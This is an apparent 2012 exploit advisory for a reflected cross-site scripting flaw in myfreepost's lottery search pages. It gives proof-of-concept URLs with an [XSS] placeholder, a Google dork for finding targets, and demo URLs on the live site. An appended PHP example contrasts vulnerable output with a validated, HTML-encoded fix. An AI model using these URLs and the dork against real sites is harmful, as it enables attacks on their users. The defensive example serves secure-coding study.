##################################################
# Exploit Title: myfreepost (searchbrief.php) <= XSS Vulnerability
# Date: 07/10/2012
# Author: Ryuzaki Lawlet
# Web/Blog: http://justryuz.blogspot.com
# 3Mail: ryuzaki_l@y7mail.com
# Category: webapps
# Google dork: fsearchbrief.php?no=
# Tested on: Linux
+---------------------------------------------------+

[~] Exploit/p0c :

http://localhost/my4D_searchbrief.php?no=[XSS]
http://localhost/sgTOTO_freq.php?draws=[

[~] Demo

http://my.myfreepost.com/my4D_searchbrief.php?no=[xss]
http://www.myfreepost.com/lottery/index.php/us/arizonalottery/pick3/search_brief/?no=[XSS]

[~] Image

http://1.bp.blogspot.com/-OKZTASS-9R4/UHCUi4fyDPI/AAAAAAAAApY/j2593IXcj38/s1600/xss.png

+---------------------------------------------------+

Greetz to : ./CyberSEC
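The reflected-XSS pattern behind a finding like this, next to its fix, as an added example that is not myfreepost's own code (the application source is not shown here): only the `no` parameter name comes from the URLs above; the function names, the page markup and the assumed draw-number format (up to 8 digits) are hypothetical.

```php
<?php
// Hypothetical reconstruction (not myfreepost's source) of a reflected XSS
// in a search page: the `no` query parameter is echoed into the HTML as-is.
function render_vulnerable(array $get): string
{
    $no = $get['no'] ?? '';
    // Whatever arrives in `no` is written into the page as markup, so any
    // tags it contains are interpreted by the browser instead of displayed.
    return "<p>Results for draw no. " . $no . "</p>";
}

// Hardened version: reject input that does not look like a draw number
// (assumed format: 1 to 8 digits), and HTML-encode the value at the point
// of output so the browser treats it as text, never as markup.
function render_hardened(array $get): string
{
    $no = $get['no'] ?? '';
    if (!is_string($no) || !preg_match('/^\d{1,8}$/', $no)) {
        // Do not reflect unexpected input back; answer with a plain error.
        http_response_code(400);
        return "<p>Invalid draw number.</p>";
    }
    $safe = htmlspecialchars($no, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Results for draw no. " . $safe . "</p>";
}

// Constructed inputs for demonstration (not real requests): a valid draw
// number and a value carrying markup, which the vulnerable renderer passes
// through verbatim while the hardened one refuses it.
$valid   = ['no' => '1234'];
$markup  = ['no' => '<b>1234</b>'];

echo render_vulnerable($markup), "\n";  // <p>Results for draw no. <b>1234</b></p>
echo render_hardened($markup), "\n";    // <p>Invalid draw number.</p>
echo render_hardened($valid), "\n";     // <p>Results for draw no. 1234</p>
```

Where a parameter legitimately has to carry free text, keep the `htmlspecialchars` call at the output sink and drop the numeric check; encoding at the point of output is the step that removes the XSS, the validation only narrows the attack surface further.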